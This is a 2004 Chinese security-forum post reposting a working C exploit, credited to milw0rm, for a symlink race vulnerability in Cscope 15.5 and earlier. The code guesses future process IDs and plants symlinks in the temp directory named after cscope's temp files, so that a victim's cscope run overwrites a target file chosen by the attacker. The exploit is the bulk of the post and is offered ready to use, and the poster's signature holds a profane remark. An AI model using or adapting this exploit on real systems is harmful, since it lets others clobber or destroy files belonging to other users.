Cscope <= 15.5 Symlink Vulnerability Exploit

EvilOctal

团队执行官

Rank: 8 Rank: 8

E.S.T社区执行帐号

帖子: 9833
精华: 769
积分: 40415
阅读权限: 200
性别: 男
在线时间: 3978 小时
注册时间: 2004-7-4
最后登录: 2008-10-11

发短消息
加为好友
当前离线

楼主大中小发表于 2004-12-18 10:35 只看该作者

Cscope <= 15.5 Symlink Vulnerability Exploit

信息来源：research@rexotec.com

复制内容到剪贴板

代码:

/* RXcscope exploit version 15.5 and minor */

#include <stdio.h>

#include <stdlib.h>

#include <sys/types.h>

#include <unistd.h>



#define BSIZE 64



int

main(int ac, char *av[]) {

      pid_t cur;

      u_int i=0, lst;

      char buffer[BSIZE + 1];

      

      fprintf(stdout, "\n --[ Cscope Exploit ]--\n"\

                " version 15.5 and minor \n" \

                " Gangstuck / Psirac\n" \

                " <[email]research@rexotec.com[/email]>\n\n");

                

      if (ac != 3) {

           fprintf(stderr, "Usage: %s <target> <max file creation>\n", av[0]);

           return 1;

      }

      

      cur=getpid();

      lst=cur+atoi(av[2]);

      

      fprintf(stdout, " -> Current process id is ..... [%5d]\n" \

                " -> Last process id is ........ [%5d]\n", cur, lst);

      

      while (++cur != lst) {

           snprintf(buffer, BSIZE, "%s/cscope%d.%d", P_tmpdir, cur, (i==2) ? --i : ++i);

           symlink(av[1], buffer);

      }



      return 0;

}

//milw0rm.com

曾几何时，有人对我说：装B遭雷劈。我说：去你妈的。于是，这个人又对我说：如果再说脏话，上帝会惩罚你的。我说：我操上帝。结论：彪悍的人生不需要上帝。

TOP

‹‹ 上一主题 | 下一主题 ››

邪恶八进制信息安全团队技术讨论组 » 安全测试代码{ Exploits and Shellcode } » Cscope <= 15.5 Symlink Vulnerability Exploit

Cscope &lt;= 15.5 Symlink Vulnerability Exploit

Cscope &lt;= 15.5 Symlink Vulnerability Exploit

代码:

Cscope <= 15.5 Symlink Vulnerability Exploit

Cscope <= 15.5 Symlink Vulnerability Exploit